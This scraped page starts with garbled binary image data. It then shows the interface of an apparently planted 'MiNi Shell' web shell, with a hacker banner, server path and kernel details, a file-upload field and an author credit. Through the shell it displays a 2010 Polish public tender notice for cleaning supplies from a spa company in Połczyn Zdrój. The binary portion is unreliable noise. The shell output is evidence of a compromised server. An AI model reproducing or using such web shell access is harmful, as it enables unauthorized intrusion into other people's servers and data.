JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100228/54012-N-2010.html

<p class="kh_header"><b>Połczyn Zdrój: Dostawa profesjonalnych środków do sprzątania</b><br>
<b>Numer ogłoszenia: 54012 - 2010; data zamieszczenia: 28.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Połczyn S.A. , ul. Zdrojowa 6, 78-320 Połczyn Zdrój, woj. zachodniopomorskie, tel. 943662424 w.328; 3662626 w.317, faks 94 3662470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-polczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa profesjonalnych środków do sprzątania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Określenie kodu CPV : 
39800000-0 Środki czyszczące i polerujące
39224000-8 Miotły i szczotki i inne artykuły różnego rodzaju
39525000-8 Różne wyroby włókiennicze z tworzyw sztucznych
2.	Przedmiot zamówienia obejmuje : 
2.1 Zadanie nr 1: Profesjonalne środki do utrzymania czystości w obiektach Zamawiającego
2.2 Zadanie nr 2:  Pozostałe artykuły do utrzymania czystości.
3. Wykonawca obowiązany jest załączyć do złożonej oferty po jednej próbce ( po jednej sztuce najmniejszego opakowania handlowego ) asortymentu określonego w dziale III SIWZ ustęp 2.1
3.1. Próbki należy oznakować (nazwa Wykonawcy) i złożyć w sekretariacie Zamawiającego przy ulicy Zdrojowej 6 w Połczynie Zdroju do dnia 09 marca 2010r. do godziny 10:00.
3.2. Próbki są bezzwrotne.
3.2.1. Uwaga : Brak próbek załączonych do oferty skutkować będzie odrzuceniem oferty. 
4.Wykonawca obowiązany jest uwzględnić w cenie asortymentu koszt dostawy przedmiotu zamówienia do siedziby Zamawiającego w Połczynie Zdroju.
5.Wykonawca obowiązany jest dostarczyć nieodpłatnie sprzęt, o którym mowa w §3 ust.2  oraz §6 projektu umowy (załącznik nr 5 do SWIZ
Zad. nr 1
Przedmiot zamówienia	ilość w  litrach roztworu  roboczego
Płynny środek  do ręcznego  mycia powierzchni podłóg	170000
Płynny środek  do ręcznego  mycia  powierzchni zmywalnych (glazury, terakoty,  itp..)	50600
Środek   do czyszczenia i konserwacji mebli 	1500
Środek do udrażniania rur płyn lub granulat)	200
Płyn do mycia szyb	1500
Środek dezynfekujący do toalet	2000
Płyn do mycia urządzeń sanitarnych,do usuwania kamienia i rdzy	3000
Preparaty do odświeżania powietrza w pomieszczeniach	1000

Zad. nr 2 
lp	nazwa artykułu	jm	ilość
1	gąbki  do mycia naczyn z ostrą stroną o wymiarach 4-5x7-8 (op.10 szt)	szt	600
2	gabki duze do naczyń z ostra strona o wymiarach 17x10x7 cm (op.5szt)	szt	500
3	kosz plastikowe na smieci uchylne poj. 25-30l	szt	100
4	miska plastikowa okragła 40 cm	szt	100
5	wiadro z wyciskaczem do mopa poj. 14l	szt	100
6	mopy paskowe małe	szt	100
7	mopy paskowe duze	szt	100
8	mydło w płynie zagęszczone, op.5l, delikatne 	szt	1000
9	pasta bhp 0,5 bez piasku	szt	120
10	scierka z mikrofazy o wymiarach 38-40x28-30 rózne kolory	szt	300
11	ścierki do podogi białe o wym. 60-70x70-80 cm	szt	500
12	szczotka ryzowa dł. Min 20 cm	szt	30
13	zmywak do naczyń 	szt.	300
14	szczotka do zamiatania na kiju	szt.	50
15	płyn do ręcznego mycia naczyń, zagęszczony op. 5l.	szt	200
16	pasta do podłogi	kg	10
17	mydło toaletowe, kostka 100g	szt	1500
18	proszek do prania uniwersalny 	kg	150
19	pasta do szorowania sanitarna 250g	szt	500
20	kostka wc koszyk	szt	2000
21	zmiotka	szt	50
22	mydło marsylskie	l	60
23	preparat do usuwania pleśni	l	50
24	rękawice grube typu Vileda (S,M,L)	para	600
25	końcówka mop bawełna midi	szt	150
26	końcówka mop bawełna maxi	szt	150
27	szczotka do wc komplet	szt	400.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Maksymalnie 20 % ilości i wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.22.40.00-8, 39.52.50.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Informacje dotyczące wadium :
1.1. Zamawiający żąda wniesienia wadium w wysokości 500,00 złotych (słownie : pięćset złotych) wadium zadanie nr 1 i  500,00 złotych (słownie : pięćset złotych) wadium zadanie nr 2. 1.2. Wadium należy wnieść przed terminem składania ofert tj. do godziny 10:00 dnia 22 lutego 2010 r.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
w pieniądzu przelewem na rachunek bankowy ;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,   z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty,

3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
Bank Zachodni WBK nr 77 1090 2662 0000 0001 0262 0438
4. Zwrot i zatrzymanie wadium następuje zgodnie z art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca obowiązany jest załączyć do złożonej oferty po jednej próbce ( po jednej sztuce najmniejszego opakowania handlowego ) asortymentu określonego w dziale III SIWZ ustęp 2.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-polczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Połczyn S.A.
ul. Zdrojowa 6
78-320 Połczyn Zdrój
tel. 094 36-62-424, 094 36-62-666
fax 094 36-62-470.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2010 godzina 10:00, miejsce: Uzdrowisko Połczyn S.A.
ul. Zdrojowa 6
78-320 Połczyn Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Profesjonalne środki do utrzymania czystości w obiektach Zamawiającego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia	ilość w  l r-ru roboczego
Płynny środek  do ręcznego  mycia powierzchni podłóg	170000
Płynny środek  do ręcznego  mycia  powierzchni zmywalnych (glazury, terakoty,  itp..)	50600
Środek   do czyszczenia i konserwacji mebli 	1500
Środek do udrażniania rur płyn lub granulat)	200
Płyn do mycia szyb	1500
Środek dezynfekujący do toalet	2000
Płyn do mycia urządzeń sanitarnych,do usuwania kamienia i rdzy	3000
Preparaty do odświeżania powietrza w pomieszczeniach	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pozostałe artykuły do utrzymania czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp	nazwa artykułu	jm	ilość
1	gąbki  do mycia naczyn z ostrą stroną o wymiarach 4-5x7-8 (op.10 szt)	szt	600
2	gabki duze do naczyń z ostra strona o wymiarach 17x10x7 cm (op.5szt)	szt	500
3	kosz plastikowe na smieci uchylne poj. 25-30l	szt	100
4	miska plastikowa okragła 40 cm	szt	100
5	wiadro z wyciskaczem do mopa poj. 14l	szt	100
6	mopy paskowe małe	szt	100
7	mopy paskowe duze	szt	100
8	mydło w płynie zagęszczone, op.5l, delikatne 	szt	1000
9	pasta bhp 0,5 bez piasku	szt	120
10	scierka z mikrofazy o wymiarach 38-40x28-30 rózne kolory	szt	300
11	ścierki do podogi białe o wym. 60-70x70-80 cm	szt	500
12	szczotka ryzowa dł. Min 20 cm	szt	30
13	zmywak do naczyń 	szt.	300
14	szczotka do zamiatania na kiju	szt.	50
15	płyn do ręcznego mycia naczyń, zagęszczony op. 5l.	szt	200
16	pasta do podłogi	kg	10
17	mydło toaletowe, kostka 100g	szt	1500
18	proszek do prania uniwersalny 	kg	150
19	pasta do szorowania sanitarna 250g	szt	500
20	kostka wc koszyk	szt	2000
21	zmiotka	szt	50
22	mydło marsylskie	l	60
23	preparat do usuwania pleśni	l	50
24	rękawice grube typu Vileda (S,M,L)	para	600
25	końcówka mop bawełna midi	szt	150
26	końcówka mop bawełna maxi	szt	150
27	szczotka do wc komplet	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8, 39.52.50.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com